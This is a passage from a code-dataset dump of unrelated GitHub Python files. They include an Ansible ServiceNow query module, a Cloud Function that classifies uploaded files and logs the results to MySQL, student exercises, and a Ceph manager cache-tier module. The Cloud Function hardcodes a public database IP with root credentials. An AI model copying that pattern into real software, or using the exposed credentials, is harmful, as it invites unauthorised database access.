from a specified table from ServiceNow\n based on a query dictionary.\n\noptions:\n instance:\n description:\n - The service now instance name\n required: true\n username:\n description:\n - User to connect to ServiceNow as\n required: true\n password:\n description:\n - Password for username\n required: true\n table:\n description:\n - Table to query for records\n required: false\n default: incident\n query:\n description:\n - Dict to query for records\n required: true\n max_records:\n description:\n - Maximum number of records to return\n required: false\n default: 20\n order_by:\n description:\n - Field to sort the results on. 
Can prefix with \"-\" or \"+\" to\n change decending or ascending sort order.\n default: \"-created_on\"\n required: false\n return_fields:\n description:\n - Fields of the record to return in the json\n required: false\n default: all fields\n\nrequirements:\n - python pysnow (pysnow)\n\nauthor:\n - Tim Rightnour (@garbled1)\n'''\n\nEXAMPLES = '''\n- name: Search for incident assigned to group, return specific fields\n snow_search_records:\n username: ansible_test\n password: my_password\n instance: dev99999\n table: incident\n query:\n assignment_group: d625dccec0a8016700a222a0f7900d06\n return_fields:\n - number\n - opened_at\n\n- name: Find open standard changes with my template\n snow_record_find:\n username: ansible_test\n password: my_password\n instance: dev99999\n table: change_request\n query:\n AND:\n equals:\n active: \"True\"\n type: \"standard\"\n u_change_stage: \"80\"\n contains:\n u_template: \"MY-Template\"\n return_fields:\n - sys_id\n - number\n - sys_created_on\n - sys_updated_on\n - u_template\n - active\n - type\n - u_change_stage\n - sys_created_by\n - description\n - short_description\n'''\n\nRETURN = '''\nrecord:\n description: The full contents of the matching ServiceNow records as a list of records.\n type: dict\n returned: always\n'''\n\nfrom ansible.module_utils.basic import AnsibleModule\n# Pull in pysnow\nHAS_PYSNOW = False\ntry:\n import pysnow\n from pysnow.exceptions import NoResults\n HAS_PYSNOW = True\n\nexcept ImportError:\n pass\n\n\nclass BuildQuery(object):\n '''\n This is a BuildQuery manipulation class that constructs\n a pysnow.QueryBuilder object based on data input.\n '''\n\n def __init__(self, module):\n self.module = module\n self.logic_operators = [\"AND\", \"OR\", \"NQ\"]\n self.condition_operator = {\n 'equals': self._condition_closure,\n 'not_equals': self._condition_closure,\n 'contains': self._condition_closure,\n 'not_contains': self._condition_closure,\n 'starts_with': self._condition_closure,\n 'ends_with': self._condition_closure,\n 'greater_than': self._condition_closure,\n 'less_than': self._condition_closure,\n }\n self.accepted_cond_ops = self.condition_operator.keys()\n self.append_operator = False\n self.simple_query = True\n self.data = module.params['query']\n\n def _condition_closure(self, cond, query_field, query_value):\n self.qb.field(query_field)\n getattr(self.qb, cond)(query_value)\n\n def _iterate_fields(self, data, logic_op, cond_op):\n if isinstance(data, dict):\n for query_field, query_value in data.items():\n if self.append_operator:\n getattr(self.qb, logic_op)()\n self.condition_operator[cond_op](cond_op, query_field, query_value)\n self.append_operator = True\n else:\n self.module.fail_json(msg='Query is not in a supported format')\n\n def _iterate_conditions(self, data, logic_op):\n if isinstance(data, dict):\n for cond_op, fields in data.items():\n if (cond_op in self.accepted_cond_ops):\n self._iterate_fields(fields, logic_op, cond_op)\n else:\n self.module.fail_json(msg='Supported conditions: {0}'.format(str(self.condition_operator.keys())))\n else:\n self.module.fail_json(msg='Supported conditions: {0}'.format(str(self.condition_operator.keys())))\n\n def _iterate_operators(self, data):\n if isinstance(data, dict):\n for logic_op, cond_op in data.items():\n if (logic_op in self.logic_operators):\n self.simple_query = False\n self._iterate_conditions(cond_op, logic_op)\n elif self.simple_query:\n self.condition_operator['equals']('equals', logic_op, cond_op)\n break\n else:\n 
self.module.fail_json(msg='Query is not in a supported format')\n else:\n self.module.fail_json(msg='Supported operators: {0}'.format(str(self.logic_operators)))\n\n def build_query(self):\n self.qb = pysnow.QueryBuilder()\n self._iterate_operators(self.data)\n return (self.qb)\n\n\ndef run_module():\n # define the available arguments/parameters that a user can pass to\n # the module\n module_args = dict(\n instance=dict(default=None, type='str', required=True),\n username=dict(default=None, type='str', required=True, no_log=True),\n password=dict(default=None, type='str', required=True, no_log=True),\n table=dict(type='str', required=False, default='incident'),\n query=dict(default=None, type='dict', required=True),\n max_records=dict(default=20, type='int', required=False),\n order_by=dict(default='-created_on', type='str', required=False),\n return_fields=dict(default=None, type='list', required=False)\n )\n\n module = AnsibleModule(\n argument_spec=module_args,\n supports_check_mode=True\n )\n\n # check for pysnow\n if not HAS_PYSNOW:\n module.fail_json(msg='pysnow module required')\n\n result = dict(\n changed=False,\n instance=module.params['instance'],\n table=module.params['table'],\n query=module.params['query'],\n max_records=module.params['max_records'],\n return_fields=module.params['return_fields']\n )\n\n # do the lookup\n try:\n conn = pysnow.Client(instance=module.params['instance'],\n user=module.params['username'],\n password=module.params['password'])\n except Exception as detail:\n module.fail_json(msg='Could not connect to ServiceNow: {0}'.format(str(detail)), **result)\n\n try:\n bq = BuildQuery(module)\n qb = bq.build_query()\n record = conn.query(table=module.params['table'],\n query=qb)\n if module.params['return_fields'] is not None:\n res = record.get_multiple(fields=module.params['return_fields'],\n limit=module.params['max_records'],\n order_by=[module.params['order_by']])\n else:\n res = record.get_multiple(limit=module.params['max_records'],\n order_by=[module.params['order_by']])\n except:\n module.fail_json(msg='Failed to find record: {0}'.format(str(detail)), **result)\n\n try:\n result['record'] = list(res)\n except NoResults:\n result['record'] = []\n\n module.exit_json(**result)\n\n\ndef main():\n run_module()\n\nif __name__ == '__main__':\n main()\n","repo_name":"garbled1/ansible_modules","sub_path":"library/snow_record_find.py","file_name":"snow_record_find.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"9577221577","text":"# Author / Modifier: Parth Panchal\n# Credit : request the remote object using URL (source : https://docs.python.org/3.2/library/urllib.request.html)\n# Credit : STACKOVERFLOW loading the pickle file object (source : https://stackoverflow.com/questions/35067957/how-to-read-pickle-file)\n# Credit : Scikit learn document for obtaning vectorizer from the object (source : https://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.CountVectorizer.html)\n\nfrom google.cloud import storage\nimport urllib.request as request\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport mysql.connector\nimport pickle\ndef hello_gcs(event, context):\n \"\"\"Triggered by a change to a Cloud Storage bucket.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n bucket_name = event['bucket']\n source_blob_name = event['name']\n print(bucket_name)\n 
print(source_blob_name)\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n content = blob.download_as_string()\n print(content)\n input_array = []\n input_array.append(content)\n modelRequest = request.urlopen(\"https://storage.googleapis.com/trainingresourcebucket/training_20200726_213915/kmeans_model.pkl\")\n wordsUrl = request.urlopen(\"https://storage.googleapis.com/trainingresourcebucket/training_vectorizer_20200726_213916/vectorizer_model.pkl\")\n model = pickle.load (modelRequest)\n words = pickle.load(wordsUrl)\n vectorizerLoader = TfidfVectorizer(vocabulary=words)\n Y = vectorizerLoader.fit_transform(input_array)\n outputPrediction = model.predict(Y)\n resultantPredictionArray = []\n resultantPredictionArray = outputPrediction.astype(int)\n cluster_number = resultantPredictionArray[0]\n cluster_number = str(cluster_number)\n print(cluster_number)\n mydb = mysql.connector.connect(\n host=\"35.192.37.150\",\n user=\"root\",\n password=\"root12345\",\n database=\"store_file_cluster_db\"\n )\n mycursor = mydb.cursor()\n sql = \"INSERT INTO `store_file_cluster_db`.`cluster_file_info` (`file_name`, `cluster_number`) VALUES (%s, %s);\"\n val = (source_blob_name, cluster_number)\n mycursor.execute(sql, val)\n\n mydb.commit()\n\n print(mycursor.rowcount, \"record inserted.\")","repo_name":"gamidiv10/serverless-lms","sub_path":"Machine Learning /cloudFunctionForPrediction/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"29411850323","text":"\nimport logging\nimport pydantic\nimport starlite\nfrom typing import Literal, List\nfrom starlite import Controller, get\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Cat(pydantic.BaseModel):\n name: str\n color: Literal['orange', 'brown']\n age: int\n\n\nclass CatController(Controller):\n path = \"/cats\"\n\n @get()\n async def list_cats(self) -> List[Cat]:\n return [Cat(name='talon', color='brown', age='18')]\n\n\nif __name__ == '__main__':\n logging.info('Starting')\n\n talon = Cat(name='talon', color='brown', age='18')\n print(talon)\n\n app = starlite.Starlite(route_handlers=[CatController])\n pass\n","repo_name":"KodingForKittehs/StarliteTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9530100843","text":"from __future__ import unicode_literals\nfrom ..model.managed_app_data_encryption_type import ManagedAppDataEncryptionType\nfrom ..model.managed_mobile_app import ManagedMobileApp\nfrom ..model.managed_app_policy_deployment_summary import ManagedAppPolicyDeploymentSummary\nfrom ..one_drive_object_base import OneDriveObjectBase\n\n\nclass IosManagedAppProtection(OneDriveObjectBase):\n\n def __init__(self, prop_dict={}):\n self._prop_dict = prop_dict\n\n @property\n def app_data_encryption_type(self):\n \"\"\"\n Gets and sets the appDataEncryptionType\n \n Returns: \n :class:`ManagedAppDataEncryptionType`:\n The appDataEncryptionType\n \"\"\"\n if \"appDataEncryptionType\" in self._prop_dict:\n if isinstance(self._prop_dict[\"appDataEncryptionType\"], OneDriveObjectBase):\n return self._prop_dict[\"appDataEncryptionType\"]\n else :\n self._prop_dict[\"appDataEncryptionType\"] = ManagedAppDataEncryptionType(self._prop_dict[\"appDataEncryptionType\"])\n return 
self._prop_dict[\"appDataEncryptionType\"]\n\n return None\n\n @app_data_encryption_type.setter\n def app_data_encryption_type(self, val):\n self._prop_dict[\"appDataEncryptionType\"] = val\n\n @property\n def minimum_required_sdk_version(self):\n \"\"\"\n Gets and sets the minimumRequiredSdkVersion\n \n Returns:\n str:\n The minimumRequiredSdkVersion\n \"\"\"\n if \"minimumRequiredSdkVersion\" in self._prop_dict:\n return self._prop_dict[\"minimumRequiredSdkVersion\"]\n else:\n return None\n\n @minimum_required_sdk_version.setter\n def minimum_required_sdk_version(self, val):\n self._prop_dict[\"minimumRequiredSdkVersion\"] = val\n\n @property\n def deployed_app_count(self):\n \"\"\"\n Gets and sets the deployedAppCount\n \n Returns:\n int:\n The deployedAppCount\n \"\"\"\n if \"deployedAppCount\" in self._prop_dict:\n return self._prop_dict[\"deployedAppCount\"]\n else:\n return None\n\n @deployed_app_count.setter\n def deployed_app_count(self, val):\n self._prop_dict[\"deployedAppCount\"] = val\n\n @property\n def face_id_blocked(self):\n \"\"\"\n Gets and sets the faceIdBlocked\n \n Returns:\n bool:\n The faceIdBlocked\n \"\"\"\n if \"faceIdBlocked\" in self._prop_dict:\n return self._prop_dict[\"faceIdBlocked\"]\n else:\n return None\n\n @face_id_blocked.setter\n def face_id_blocked(self, val):\n self._prop_dict[\"faceIdBlocked\"] = val\n\n @property\n def apps(self):\n \"\"\"Gets and sets the apps\n \n Returns: \n :class:`AppsCollectionPage`:\n The apps\n \"\"\"\n if \"apps\" in self._prop_dict:\n return AppsCollectionPage(self._prop_dict[\"apps\"])\n else:\n return None\n\n @property\n def deployment_summary(self):\n \"\"\"\n Gets and sets the deploymentSummary\n \n Returns: \n :class:`ManagedAppPolicyDeploymentSummary`:\n The deploymentSummary\n \"\"\"\n if \"deploymentSummary\" in self._prop_dict:\n if isinstance(self._prop_dict[\"deploymentSummary\"], OneDriveObjectBase):\n return self._prop_dict[\"deploymentSummary\"]\n else :\n self._prop_dict[\"deploymentSummary\"] = ManagedAppPolicyDeploymentSummary(self._prop_dict[\"deploymentSummary\"])\n return self._prop_dict[\"deploymentSummary\"]\n\n return None\n\n @deployment_summary.setter\n def deployment_summary(self, val):\n self._prop_dict[\"deploymentSummary\"] = val\n\n","repo_name":"MIchaelMainer/msgraph-v10-models-python","sub_path":"models/ios_managed_app_protection.py","file_name":"ios_managed_app_protection.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"23751974734","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 14 01:18:44 2023\n\n@author: krishnarajmayya\n\"\"\"\n\nimport json\nwith open(\"shannon-radii.json\") as f:\n out = f.read()\n\nd = json.loads(out)\n\n# Enter Element, Charge, Coordination and one of - r_crystal, r_ionic, spin, remark\n\nprint(d['Br'])","repo_name":"krishnarajmayya/MLFreeEnergyPerorskites","sub_path":"predictingFE/data_preparation/collect_shannon_radii/read_shannon.py","file_name":"read_shannon.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74469312134","text":"'''\n\n[+]Temporal marker : 10:51 Hours | Saturday 28, 2020\n[+]Temporal marker untethered: 10:46 Hours | Sunday 29, 2020\n[+]Comments : Coulnd't solve in optimal setting\n Devised the basic approach using hint\n Couldn't implement the correct solution\n I was finally tired and used the 
editorial solution\n matter is closed now\n[+]Space Complexity : O(N)\n[+]Time Complexity : O(N)\n[+]Level : MEDIUM\n[+]Tread Speed : Relaxed\n[+]LINK : https://www.interviewbit.com/problems/nearest-smaller-element\n[+] Supplement Sources : N/A\n\n'''\n\n# TLE\ndef getPermutation_obsolete(A, B):\n import itertools as iter\n lis = [x for x in range(1, A+1)]\n ans = [x for x in iter.permutations(lis)][B-1]\n solution = \"\"\n for x in ans:\n solution += str(x)\n return solution\n\n#EDITORIAL SOLUTION\ndef getPermutation(n, k):\n import math\n lis = [x for x in range(1, n+1)]\n permutation = \"\"\n k -= 1\n while n > 0:\n n -= 1\n index, k = divmod(k,math.factorial(n))\n permutation += str(lis[index])\n lis = lis[:index]+lis[index+1:]\n return permutation\n\nif __name__ == '__main__':\n #print(permute([x for x in range(1,4)]))\n length = 4\n import math\n for index in range(1, math.factorial(length)+1):\n print(index,end=\" >> :\")\n print(getPermutation(length, index))\n #print(getPermutation(3,5))","repo_name":"AggarwalAnshul/Dynamic-Programming","sub_path":"InterviewBit/BackTracking/kth-permutation-sequence.py","file_name":"kth-permutation-sequence.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25177421967","text":"# 춘향이는 편의점 카운터에서 일한다.\n# 손님이 2원짜리와 5원짜리로만 거스름돈을 달라고 한다. 2원짜리 동전과 5원짜리 동전은 무한정 많이 가지고 있다. \n# 동전의 개수가 최소가 되도록 거슬러 주어야 한다. 거스름돈이 n인 경우, 최소 동전의 개수가 몇 개인지 알려주는 프로그램을 작성하시오.\n# 예를 들어, 거스름돈이 15원이면 5원짜리 3개를, 거스름돈이 14원이면 5원짜리 2개와 2원짜리 2개로 총 4개를, \n# 거스름돈이 13원이면 5원짜리 1개와 2원짜리 4개로 총 5개를 주어야 동전의 개수가 최소가 된다.\n\n# solution 1\ndef main():\n cash = int(input())\n print(greedy_solution(cash))\n\ndef greedy_solution(cash : int) :\n # 5의 배수인지 확인\n remained_five = cash % 5\n # 5의 나머지 값이 짝수일 때 공식\n change_formula = ((cash // 5) + (remained_five // 2))\n # 5의 배수일 경우 5로 나눈 값을 반환\n if remained_five == 0 :\n return cash // 5\n # 5로 나눈 나머지가 홀수일 경우 5원으로 처리 하려 하면 2원으로 나누었을때 0으로 떨어지지 않는다.\n elif remained_five % 2 != 0 :\n # 거슬러 줄 수 없는 1과 3은 예외처리\n if cash == 1 or cash == 3 :\n return -1\n # 2원 계산 식 -> 5의 나머지 값에 5를 더해 2로 나눈다.\n # 5원 계산 식 -> 5로 나눈 값에서 1을 뺀다.\n else : \n return (cash // 5 - 1) + ((remained_five + 5) // 2)\n # 5로 나눈 나머지가 짝수일 경우 5원으로 나눈 최소 값을 구하고 나머지에 2를 나누어도 0으로 떨어진다.\n else :\n return change_formula\n\nmain()\n\n\n# solution2\ndef main():\n cash = int(input())\n print(greedy_solution(cash))\n\ndef greedy_solution(cash : int) :\n cnt_change = 0\n while True :\n # 손님의 금액이 5의 배수이면 \n if cash % 5 == 0 :\n cnt_change += cash // 5\n break\n # 5의 배수가 안되면 2를 빼고 다시 계산\n else : \n cnt_change += 1\n cash -= 2\n # 금액이 0보다 작아지면\n if cash < 0 :\n return -1\n #그게 아니라면\n else :\n return cnt_change\n\nmain()\n\n'''\n1 = 0\n2 = t,1\n3 = 0\n4 = t,2\n5 = f,1\n6 = t,3\n7 = f,1 t,1\n8 = t,4\n9 = f,1 t,2\n10 = f,2\n11 = f,1 t,3\n12 = f,2 t,1\n13 = f,1 t,4\n14 = f,2 t,2\n15 = f,3\n16 = f,2 t,3\n17 = f,2 t,2\n\n\n'''\n\n\n","repo_name":"HeeHyun8102/Backend-Study","sub_path":"algorithm/유길상/1주차_Greedy/거스름돈.py","file_name":"거스름돈.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18519370511","text":"'''Name: Ben Gertz\n Course: CMPS 1500\n Lab Section: Tuesday 5-6.15 PM\n Assignment: Lab 4 Part 1\n Date: 10/2/2017\n This file contains functions for use in the program for lab four relating to dictionaries.\n get_menu_chioce(), get_menu_choice(str) -> int, this function gives a user choices for action, prompts a 
user to enter a choice, prints the choice and returns the choice as an integer.\n display(d), display(str) -> str, this function prints the name and major of everyone in the dictionary.\n'''\nmajors = {'Harry': 'Computer Science', 'Hermione': 'Mathematics', 'Ron': 'English'}\ndef get_menu_choice():\n print('Majors of College Students\\n---------------------------\\n1. Look up a student\\'s major\\n2. Add a new major\\n3. Change a major\\n4. Delete a major\\n5. Display all students\\n6. Quit the program')\n valid_choice = ['1', '2', '3', '4', '5', '6']\n choice = input('Enter your choice: ')\n while choice not in valid_choice:\n choice = input('Enter a valid choice: ')\n return int(choice)\ndef display(d):\n for key in d:\n print(key, 'is a wizard in', d[key])\n","repo_name":"bgert/Python","sub_path":"lab4pr1.py","file_name":"lab4pr1.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1936860216","text":"def caesar_cipher(text, shift):\n encrypted_text = ''\n for char in text:\n if char.isalpha():\n if char.islower():\n encrypted_text += chr(((ord(char) - ord('a') + shift) % 26) + ord('a'))\n else:\n encrypted_text += chr(((ord(char) - ord('A') + shift) % 26) + ord('A'))\n else:\n encrypted_text += char\n return encrypted_text\n\nmessage = input(\"Enter the message to encrypt: \")\nshift_amount = int(input(\"Enter the shift amount (1-25): \"))\nencrypted_message = caesar_cipher(message, shift_amount)\nprint(\"Encrypted message:\", encrypted_message)\n","repo_name":"AhMedMubarak20/Basic-Text-Encryption","sub_path":"Basic Text Encryption.py","file_name":"Basic Text Encryption.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"44530239433","text":"from torch.nn.modules.module import Module\nfrom torch.nn.functional import avg_pool2d, max_pool2d\n\n\nclass RoIAlignAvg(Module):\n def __init__(self, alignedHeight, alignedWidth, spatialScale):\n super(RoIAlignAvg, self).__init__()\n\n self.alignedWidth = int(alignedWidth)\n self.alignedHeight = int(alignedHeight)\n self.spatialScale = float(spatialScale)\n\n def forward(self, features, rois):\n x = RoIAlignFunction(self.alignedHeight + 1, self.alignedWidth + 1,\n self.spatialScale)(features, rois)\n return avg_pool2d(x, kernel_size=2, stride=1)\n","repo_name":"SharadDixit/Faster-R-CNN-PytorchImplementation-","sub_path":"ROI/RoIAlignAvg.py","file_name":"RoIAlignAvg.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22768914155","text":"from checker_helpers import *\nfrom checker_minimax import *\nfrom play_checker import *\nimport matplotlib.pyplot as plt\n\ndef evaluate_minimax_checker(size):\n results = [play_checker(size, baseline, minimax) for i in range(100)]\n winner, player0_node_count, player1_node_count, player1_score, player2_score = zip(*results)\n return winner, player0_node_count, player1_node_count, player1_score, player2_score\n\nif __name__ == \"__main__\":\n experiment_result = {4:{0:0, 1:0, -1:0}, 6:{0:0, 1:0, -1:0}, 8:{0:0, 1:0, -1:0}, 10:{0:0, 1:0, -1:0}}\n figures = []\n i = 1\n for size in experiment_result.keys():\n winner, player0_node_count, player1_node_count, player1_score, player2_score = evaluate_minimax_checker(size)\n experiment_result[size][0] = winner.count(0)\n experiment_result[size][1] = winner.count(1)\n 
experiment_result[size][-1] = winner.count(-1)\n \n f = plt.figure(i)\n plt.subplot(2,3, 1)\n plt.hist(player0_node_count, 'auto')\n plt.xlabel('Baseline Node Count', fontsize = 14)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.subplot(2,3, 2)\n plt.hist(player1_node_count, 'auto')\n plt.xlabel('Minimax Node Count', fontsize = 14)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.subplot(2,3, 4)\n plt.hist(player1_score, 'auto')\n plt.xlabel('Baselin Final scores', fontsize = 14)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.subplot(2,3, 5)\n plt.hist(player2_score, 'auto')\n plt.xlabel('Minimax Final scores', fontsize = 14)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.subplot(2,3, 6)\n ratio = [experiment_result[size][0]/size, experiment_result[size][1]/size, experiment_result[size][-1]/size]\n labels = ['baseline Win', 'minimax Win', 'tie']\n plt.pie(ratio, labels=labels, autopct='%.1f%%', startangle=260, counterclock=False)\n \n figures.append(f)\n i += 1\n plt.show()\n\n for size, result in experiment_result.items():\n print (\"[ Size : %d ]\"%size)\n print(\"- player 0 win : %d times\"%result[0])\n print(\"- player 1 win : %d times\"%result[1])\n print(\"- tie : %d times\\n\"%result[-1])\n\n","repo_name":"wonkr/CIS667_project","sub_path":"evaluate_minimax_checker.py","file_name":"evaluate_minimax_checker.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18517040976","text":"import errno\nimport logging\nimport json\nimport subprocess\nimport time\nimport textwrap\nfrom threading import Event, Thread\n\nfrom mgr_module import MgrModule\n\nfrom geopy.geocoders import Nominatim \nfrom geopy.distance import geodesic\n\n# https://pythonhosted.org/python-geoip/\n# https://pypi.org/project/geopy/\n# https://github.com/maxmind/GeoIP2-python\n\nclass Module(MgrModule):\n COMMANDS = [\n {\n 'cmd': 'cache list pools',\n 'desc': \"List cache tier pools and status\",\n 'perm': 'r'\n },\n {\n 'cmd': 'cache list crush',\n 'desc': 'List backing pool and cache enabled crush rule associations',\n 'perm': 'r'\n },\n {\n 'cmd': 'cache list simulated',\n 'desc': 'List manual override locations',\n 'perm': 'r'\n },\n {\n 'cmd': 'cache list locations',\n 'desc': 'List crush rule and location associations',\n 'perm': 'r'\n },\n {\n 'cmd': 'cache add crush '\n 'name=crush_rule,type=CephString '\n 'name=pool_name,type=CephString ',\n 'desc': \"associate a backing pool with CRUSH rule to be used for cache pools\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache remove crush '\n 'name=crush_rule,type=CephString '\n 'name=pool_name,type=CephString ',\n 'desc': \"Remove crush rule association from backing pool\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache enable '\n 'name=crush_rule,type=CephString '\n 'name=enable,type=CephBool ',\n 'desc': \"enable cache tier creation on demand using given CRUSH rule\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache add location '\n 'name=crush_rule,type=CephString '\n 'name=location,type=CephString '\n 'name=proximity,type=CephInt,req=false ',\n 'desc': \"associate location with CRUSH rule. 
May be given as lat/long pair or as an address string specific enough to lookup and identify region (state, city, zip, etc)\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache simulate location '\n 'name=location,type=CephString ',\n 'desc': \"Simulate response as if traffic were exceeding threshold(s) for location\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache no simulate location '\n 'name=location,type=CephString ',\n 'desc': \"Stop simulating high client traffic from specified location (specify lat,lon as listed in 'cache list location')\",\n 'perm': 'rw'\n },\n\n ]\n\n MODULE_OPTIONS = [\n {\n 'name': 'traffic_threshold_bytes',\n 'desc': 'avg bytes/s of traffic to create or remove cache tiers',\n 'type': 'int',\n 'runtime': True\n },\n {\n 'name': 'traffic_threshold_ratio',\n 'desc': 'ratio of traffic from geoip block vs other traffic to create or remove cache tiers',\n 'type': 'int',\n 'runtime': True\n },\n {\n 'name': 'default_cache_size',\n 'type': 'int',\n 'default': 1024,\n 'desc': 'default max size in MB for for cache pools (converted to bytes to set target_max_bytes). Default 1024MB',\n 'runtime': True\n },\n {\n 'name': 'default_cache_objects',\n 'type': 'int',\n 'default': 0,\n 'desc': 'default max objects for cache pools (sets target_max_objects). Default is disabled (0)',\n 'runtime': True\n },\n {\n 'name': 'proximity',\n 'desc': 'Max client distance in miles from cache tier location which will trigger new tier creation',\n 'type': 'int',\n 'default': 100,\n 'runtime': True\n },\n {\n 'name': 'cooldown_duration',\n 'desc': 'how long to leave cache tier in place after thresholds are no longer met (seconds), default 1800 (30 mins), 0 to disable automatic removal',\n 'type': 'int',\n 'default': 10,\n # 'default': 1800,\n 'runtime': True\n },\n {\n 'name': 'min_size',\n 'type': 'int',\n 'default': 2,\n 'desc': 'default min_size for new cache pools',\n 'runtime': True\n },\n {\n 'name': 'size',\n 'type': 'int',\n 'default': 3,\n 'desc': 'default size (replicas) for new cache pools',\n 'runtime': True\n },\n {\n 'name': 'pg_num',\n 'type': 'int',\n 'default': 4,\n 'desc': 'default pg_num for new cache pools',\n 'runtime': True\n },\n {\n 'name': 'suffix',\n 'type': 'str',\n 'default': '.cache',\n 'desc': 'suffix appended to new cache tier pools (name will be backing pool name + suffix)',\n 'runtime': True\n },\n\n ]\n\n def __init__(self, *args, **kwargs):\n super(Module, self).__init__(*args, **kwargs)\n self.geolocator = Nominatim(user_agent=\"osiris-ceph-mgr-cachetier\")\n self.interval = 60\n self.event = Event()\n self.workers = dict()\n self.suffix = self.get_module_option('suffix')\n self.cooldown = self.get_module_option('cooldown_duration')\n self.proximity = self.get_module_option('proximity')\n self.pg_num = self.get_module_option('pg_num')\n self.run = True\n # self.tasks = queue.Queue(maxsize=100)\n # queue for tasks\n # self.queue = Queue.Queue(maxsize=100)\n\n # location = geolocator.reverse(\"52.509669, 13.376294\")\n # location = geolocator.geocode(\"175 5th Avenue NYC\")\n # might need this...\n # self._background_jobs = Queue.Queue()\n\n def serve(self):\n self.log.info('Starting cachetier module')\n while self.run:\n self.poll_traffic()\n self.manage_cache()\n self.log.info(\"Finished traffic poll and cache management loop, sleeping for {} seconds\".format(self.interval))\n self.event.wait(self.interval)\n\n def shutdown(self):\n self.log.info('Stopping cachetier module')\n self.run = False\n self.event.set()\n \n def handle_command(self, inbuf, cmd):\n handler_name = 
\"_cmd_\" + cmd['prefix'].replace(\" \", \"_\")\n try:\n handler = getattr(self, handler_name)\n except AttributeError:\n return -errno.EINVAL, \"\", \"Unknown command\"\n\n return handler(inbuf, cmd)\n\n # not built into MgrModule for some reason...\n def get_pretty_footer(self, width):\n # dash line\n ret = '+'\n ret += '-' * (width - 1) + '+'\n ret += '\\n'\n return ret\n\n def _cmd_cache_list_crush(self,inbuf,cmd):\n stored_pools = self.fetch('cache_assoc')\n ret = ''\n ret += self.get_pretty_header(('Pool', 'Cache Targets (crush rules)'), 80)\n for pool in stored_pools:\n for crush in stored_pools[pool]:\n ret += self.get_pretty_row((pool,crush), 80) + '\\n'\n\n ret += self.get_pretty_footer(80)\n return (0, '', ret)\n # ({'backing_pool': pool, 'cache_pool': \"{}.{}\".format(pool, self.suffix) , 'state': 'active', 'timestamp': time.time() })\n\n def _cmd_cache_list_locations(self,inbuf,cmd):\n stored_loc = self.fetch('loc_assoc')\n ret = ''\n ret += self.get_pretty_header((\"Crush - Lat/Lon - Proximity\", \"Location Desc\"), 80)\n\n for crush_rule in stored_loc:\n for ldata in stored_loc[crush_rule]:\n lat = ldata[0]\n lon = ldata[1]\n prox = ldata[2]\n latlon = \"{},{}\".format(lat,lon)\n location = self.geolocator.reverse((lat,lon)).address.encode('utf-8')\n cell1 = (crush_rule, latlon, '{} Miles'.format(prox))\n cell2 = textwrap.wrap(location, width=40)\n for idx in range(0, len(cell2)):\n if idx < len(cell1):\n row_elem = cell1[idx]\n else:\n row_elem = ''\n ret += self.get_pretty_row((row_elem, cell2[idx]), 80) + '\\n'\n ret += self.get_pretty_footer(80)\n return (0, '', ret)\n \n def _cmd_cache_list_pools(self,inbuf,cmd):\n stored_active = self.fetch('cache_active')\n ret = ''\n ret += self.get_pretty_header(('Pool', 'Cache Pool', 'Crush', 'Status', 'Created'), 80)\n\n for crush_rule in stored_active:\n ret = ''\n for cache_info in stored_active[crush_rule]:\n time = time.localtime(cache_info['timestamp']).strftime(\"%m-%d-%y %H:%M:%S %Z\")\n row_elems = (cache_info['backing_pool'], cache_info['cache_pool'], crush_rule, cache_info['state'], time)\n ret += self.get_pretty_row(row_elems, 80) + '\\n'\n ret += self.get_pretty_footer(80)\n\n return (0, '', ret)\n\n def _cmd_cache_list_simulated(self,inbuf,cmd):\n stored_override = self.fetch('loc_override')\n ret = ''\n ret += self.get_pretty_header(('Lat/Lon', 'Identifier'), 80)\n for loc in stored_override:\n latlon = \"{},{}\".format(loc[0],loc[1])\n # ret += latlon\n # if we don't explicitely encode utf-8 here we get an 'ordinal not in range' exception printing out the address\n # UnicodeEncodeError: 'ascii' codec can't encode character u'\\xa0' in position 41: ordinal not in range(128)\n 